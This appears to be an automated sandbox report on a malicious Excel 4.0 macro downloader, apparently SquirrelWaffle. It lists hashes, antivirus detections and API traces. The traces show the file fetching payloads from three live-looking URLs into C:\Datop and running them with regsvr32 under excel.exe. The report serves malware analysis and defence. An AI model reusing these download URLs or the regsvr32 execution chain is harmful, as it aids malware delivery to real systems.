Summary | ZeroBOX

diagram_1318555547.xls

MSOffice File
Category Machine Started Completed
FILE s1_win7_x6403_us Oct. 8, 2021, 5:21 p.m. Oct. 8, 2021, 5:25 p.m.
Size 263.0KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 18:19:34 2015, Last Saved Time/Date: Mon Sep 20 10:25:13 2021, Security: 0
MD5 764987da4271d3dd9d7d9f8f78c897e5
SHA256 fe73fd3955380212aaecb045e92353f9684af4e89e4d1c183dd84a0b7271230b
CRC32 107685BE
ssdeep 6144:mKpb8rGYrMPe3q7Q0XV5xtuE8vG8UM+Onfb7I6+tqDWcwnoRZzlj+oSGpGvhmmmk:Gj7CqScwoRZ9bSXkh/nLKH
Yara
  • Microsoft_Office_File_Zero - Microsoft Office File

Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6bf98000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b252000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2696
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c471000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2756
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c471000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c471000
process_handle: 0xffffffff
1 0 0
cmdline regsvr32 C:\Datop\test.test
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\test2.test
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\test1.test
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\test.test
cmdline regsvr32 C:\Datop\test1.test
cmdline regsvr32 C:\Datop\test2.test
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef60000
process_handle: 0xffffffff
1 0 0
CAT-QuickHeal Excel4.Downloader.44317
Sangfor Malware.Generic-XLM.Save.ma29
K7AntiVirus Trojan ( 00568efb1 )
K7GW Trojan ( 00568efb1 )
Symantec Trojan.Gen.2
ESET-NOD32 DOC/TrojanDownloader.Agent.DIY
ClamAV Xls.Downloader.SquirrelWaffle20921-9895790-0
Kaspersky HEUR:Trojan.MSOffice.Generic
Tencent Trojan.MsOffice.Macro40.11013976
DrWeb X97M.DownLoader.714
McAfee-GW-Edition X97M/Downloader.lg
Ikarus Trojan-Downloader.Office.Crypt
Microsoft TrojanDownloader:O97M/EncDoc.RQ!MTB
McAfee X97M/Downloader.lg
Zoner Probably Heur.W97ShellB
Fortinet XF/Agent.AF!tr.dldr
Time & API Arguments Status Return Repeated

URLDownloadToFileW

url: https://cortinastelasytrazos.com/Yro6Atvj/sec.html
stack_pivoted: 0
filepath_r: C:\Datop\test.test
filepath: C:\Datop\test.test
2148270085 0

URLDownloadToFileW

url: https://orquideavallenata.com/4jmDb0s9sg/sec.html
stack_pivoted: 0
filepath_r: C:\Datop\test1.test
filepath: C:\Datop\test1.test
2148270085 0

URLDownloadToFileW

url: https://fundacionverdaderosheroes.com/gY0Op5Jkht/sec.html
stack_pivoted: 0
filepath_r: C:\Datop\test2.test
filepath: C:\Datop\test2.test
2148270085 0
parent_process excel.exe martian_process regsvr32 C:\Datop\test.test
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\test2.test
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\test1.test
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\test.test
parent_process excel.exe martian_process regsvr32 C:\Datop\test1.test
parent_process excel.exe martian_process regsvr32 C:\Datop\test2.test
file C:\Windows\System32\regsvr32.exe